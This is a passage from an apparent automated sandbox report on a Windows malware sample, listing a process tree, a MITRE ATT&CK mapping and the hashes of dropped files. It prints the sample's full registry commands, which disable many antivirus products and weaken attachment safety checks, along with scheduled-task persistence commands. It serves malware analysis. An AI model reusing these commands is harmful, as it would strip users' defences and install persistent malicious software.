/t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
            4⤵
              PID:4564
      • C:\Users\Admin\AppData\Local\Temp\BE96.exe
        C:\Users\Admin\AppData\Local\Temp\BE96.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:852
        • C:\Users\Admin\AppData\Local\Temp\BE96.exe
          C:\Users\Admin\AppData\Local\Temp\BE96.exe
          2⤵
          • Executes dropped EXE
          PID:4128
      • C:\Users\Admin\AppData\Local\Temp\CCFE.exe
        C:\Users\Admin\AppData\Local\Temp\CCFE.exe
        1⤵
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2580
      • C:\Users\Admin\AppData\Local\Temp\CFDE.exe
        C:\Users\Admin\AppData\Local\Temp\CFDE.exe
        1⤵
        • Executes dropped EXE
        PID:4072
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 736
          2⤵
          • Program crash
          PID:1788
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 760
          2⤵
          • Program crash
          PID:3644
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 764
          2⤵
          • Program crash
          PID:3984
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 892
          2⤵
          • Program crash
          PID:3476
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 856
          2⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Program crash
          PID:3444
      • C:\Users\Admin\AppData\Local\Temp\D26F.exe
        C:\Users\Admin\AppData\Local\Temp\D26F.exe
        1⤵
        • Executes dropped EXE
        PID:3648
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 732
          2⤵
          • Program crash
          PID:3604
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 748
          2⤵
          • Program crash
          PID:2648
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 752
          2⤵
          • Program crash
          PID:3936
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 880
          2⤵
          • Program crash
          PID:4016
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 744
          2⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Program crash
          PID:4004
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
          PID:716
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:2192
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            1⤵
              PID:1812
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:212
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:2652
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1136
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:1536
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:3544
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4060
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:4924
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\DtcInstall\explorer.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:4224
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "B702" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\B702\B702.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:4964
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SysWOW64\twinui\explorer.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:5008
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Boot\nb-NO\smss.exe'" /rl HIGHEST /f
                          1⤵
                          • Process spawned unexpected child process
                          • Creates scheduled task(s)
                          PID:5036

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Initial Access

                        Execution

                        Scheduled Task

                        1
                        T1053

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Scheduled Task

                        1
                        T1053

                        Privilege Escalation

                        Scheduled Task

                        1
                        T1053

                        Defense Evasion

                        Modify Registry

                        3
                        T1112

                        Disabling Security Tools

                        1
                        T1089

                        Virtualization/Sandbox Evasion

                        1
                        T1497

                        Install Root Certificate

                        1
                        T1130

                        Credential Access

                        Credentials in Files

                        2
                        T1081

                        Discovery

                        Query Registry

                        4
                        T1012

                        Virtualization/Sandbox Evasion

                        1
                        T1497

                        System Information Discovery

                        4
                        T1082

                        Peripheral Device Discovery

                        1
                        T1120

                        Lateral Movement

                        Collection

                        Data from Local System

                        2
                        T1005

                        Exfiltration

                        Command and Control

                        Web Service

                        1
                        T1102

                        Impact

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\Database.exe
                          MD5

                          30f0a5fe731fd2735b8c196fd0fe91cf

                          SHA1

                          2eb63724fd11bf8e082bcd99301654111ad0d831

                          SHA256

                          13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                          SHA512

                          acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                          Download Submit
                        • C:\ProgramData\Data\install.exe
                          MD5

                          3319cb474eaa2f3812956b271ff29635

                          SHA1

                          74fbed926e8de14fa5eb6a5a47fb873def72fb81

                          SHA256

                          79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                          SHA512

                          c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                          Download Submit
                        • C:\ProgramData\Data\install.exe
                          MD5

                          3319cb474eaa2f3812956b271ff29635

                          SHA1

                          74fbed926e8de14fa5eb6a5a47fb873def72fb81

                          SHA256

                          79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                          SHA512

                          c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                          Download Submit
                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          46fd8caf1c1ff128c4d121d58a2e9306

                          SHA1

                          f10607b0db63cf47e9fe8c01fc819e124349dc84

                          SHA256

                          f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

                          SHA512

                          6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

                          Download Submit
                        • C:\ProgramData\Runtimebroker.exe
                          MD5

                          46fd8caf1c1ff128c4d121d58a2e9306

                          SHA1

                          f10607b0db63cf47e9fe8c01fc819e124349dc84

                          SHA256

                          f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc

                          SHA512

                          6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540

                          Download Submit
                        • C:\ProgramData\Systemd\HostData.exe
                          MD5

                          cbf26c74a0a12b5f17ba7596ff6ad19f

                          SHA1

                          6dc733432c290f1fbf5ddda2571b7f538445202b

                          SHA256

                          095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                          SHA512

                          8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                          Download Submit
                        • C:\ProgramData\Systemd\HostData.exe
                          MD5

                          cbf26c74a0a12b5f17ba7596ff6ad19f

                          SHA1

                          6dc733432c290f1fbf5ddda2571b7f538445202b

                          SHA256

                          095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                          SHA512

                          8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                          Download Submit
                        • C:\ProgramData\Systemd\config.json
                          MD5

                          a285ac140c8c6806223bfdc02302173e

                          SHA1

                          06ca61cae058c568860858e49615d04dc4a8820d

                          SHA256

                          36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

                          SHA512

                          f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                          MD5

                          c558fdaa3884f969f1ec904ae7bbd991

                          SHA1

                          b4f85d04f6bf061a17f52c264c065b786cfd33ff

                          SHA256

                          3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

                          SHA512

                          6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          627b2af61da3d1d1295504e6ceb17f5b

                          SHA1

                          35ced52cb9bd0f2d897a5d9b87299fa5b477a049

                          SHA256

                          edef61840150979d18efd7d23b0636d1b677facf25b6f148aabda7b41ac37951

                          SHA512

                          8c8ef976e8a06183ef8e981e31cce2cc51bdee93bdcea21a6961931778bd814fc3a8bececce6fd0731a2e99ded29f98119489dacd538a203ee0328570f9168e8

                          Download Submit
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          MD5

                          ad6843f65114b97c6eb57a6d429acc78

                          SHA1

                          6a31ab6a245aa96672ce6684d799e662d62db082

                          SHA256

                          c8c321bdc13163d313693416ee2aa115fea7465cbbbe4ca571d23f1c057dcf54

                          SHA512

                          20d0287f5da03a7233a6240fb703238b2876d769b7acf76d5ae03972139ac8d67bb38689355687f8e50be2749751ab32fbc15c86e1b95e9c4dfd00d92a28828a

                          Download Submit
